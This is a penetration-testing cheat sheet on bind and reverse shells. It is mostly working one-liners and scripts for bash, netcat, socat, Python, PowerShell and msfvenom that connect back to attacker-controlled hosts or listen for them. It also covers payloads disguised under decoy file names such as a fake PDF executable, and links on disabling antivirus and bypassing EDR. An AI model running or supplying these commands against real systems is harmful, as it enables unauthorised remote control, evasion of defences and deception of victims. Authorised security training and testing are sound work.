Bind and Reverse Shell

Tools

Online

LazyRevShell

One-Lin3r

pip install one-lin3r

FuegoShell

GitHub - v1k1ngfr/fuegoshell: Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445GitHub

Web Shells

Web Shell

Reverse Shell - Not Web

My Pentest Tools

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

revshell.sh - Test all methods

#!/bin/bash

# Replace <YOUR_IP> with your IP address
YOUR_IP="<YOUR_IP>"
PORT=2121

# Attempt to use different methods for a reverse shell
if command -v bash > /dev/null; then
    bash -i >& /dev/tcp/$YOUR_IP/$PORT 0>&1
elif command -v nc > /dev/null; then
    nc $YOUR_IP $PORT -e /bin/bash
elif command -v python3 > /dev/null; then
    python3 -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")"
elif command -v python > /dev/null; then
    python -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")"
elif command -v perl > /dev/null; then
    perl -e "use Socket; \$i=\"$YOUR_IP\"; \$p=$PORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); connect(S,sockaddr_in(\$p,inet_aton(\$i))); open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/bash -i\");"
else
    echo "No suitable reverse shell method found."
fi

rs-shell - RS in Rust

PowerJoker - Powershell Reverse Shell - Bypass Defender

GitHub - Adkali/PowerJoker: PowerJoker is a Dynamic PowerShell Reverse-Shell Generator; Unique Payloads with different results on Each Execution.GitHub

Over UDP

GitHub - trickster0/UDPlant: UDP implantGitHub

Attack Host

nc -nlvp 1234

Netcat - Victim

# Attacker
nc -nlvp [PORT]

# Victim
## Windows
nc.exe [IP] [PORT] -e cmd.exe
## Linux
nc [IP] [PORT] -e /bin/bash
## if -e option doesn't work
mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

Netcat traditional

# Attacker
nc -nlvp [PORT]

# Victim
nc.traditional -e/bin/sh [IP] [PORT]

Socat - Victim

# Attacker
socat TCP-L:<port> -

# Victim
## Windows
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
## Linux
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

######################
# Attacker
socat TCP-L:<port> FILE:`tty`,raw,echo=0
# Victim
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Encrypted

# 1 - Generate a certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

# 2 - merge the two created files into a single .pem
cat shell.key shell.crt > shell.pem

#### REVERSE SHELL ####

# 3 - Reverse shell listener
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

# 4 - Connect back
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Bash - Victim

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

bash -c 'sh -i >& /dev/tcp/10.10.14.44/4444 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Python - Victim

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Powershell - Victim

Also Check PowerJocker and FuegoShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

If:

At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

=> Disable AV

Disable / Remove AV Defender and Firewall

Invoke-PowershellTcp.ps1

nishang/Invoke-PowerShellTcp.ps1 at master · samratashok/nishangGitHub

PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

DLL

rev_shell_dll · master · 0xdf / CTFScripts · GitLabGitLab

MSFVenom

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)Infinite Logins

msfvenom -p <PAYLOAD> <OPTIONS>

Ex:
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi

Payload naming convention: <OS>/<arch>/<payload>
Ex: linux/x86/shell_reverse_tcp

msfvenom --list payloads | grep "linux/x86/meterpreter"

Listener:

msfconsole
use multi/handler

Linux

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 712 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000

Cheatsheet:

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)Infinite Logins

Bypass AV / EDR

GitHub - murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access: EDR & Antivirus Bypass to Gain Shell AccessGitHub

Curl

Bind Shell - Not Web

Netcat -Victim

nc -lvnp 7777

# Victim
## Linux
nc -vlp [PORT] -e /bin/bash
## Windows
nc.exe -nlvp [PORT] -e cmd.exe
## if -e option doesn't work
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

# Attacker
nc [IP] [PORT]

#### BIND SHELL ####

copy the PEM file on target

# 3 - Target
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

# 4 - Attacker
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Encrypted shell

# 1 - Generate a certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

# 2 - merge the two created files into a single .pem
cat shell.key shell.crt > shell.pem

Socat - Vicitim

# Victim
## Windows
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
## Linux
socat TCP-L:<PORT> EXEC:"bash -li"

# Attacker
socat TCP:<TARGET-IP>:<TARGET-PORT> -

Bash - Victim

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f

Debugging

htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
nc: getnameinfo: Temporary failure in name resolution
htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 10.129.201.134 1234 >/tmp/f
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
	  [-m minttl] [-O length] [-P proxy_username] [-p source_port]
	  [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
	  [-X proxy_protocol] [-x proxy_address[:port]] 	  [destination] [port]
htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f

Python - Victim

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Powershell - Vicitm

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();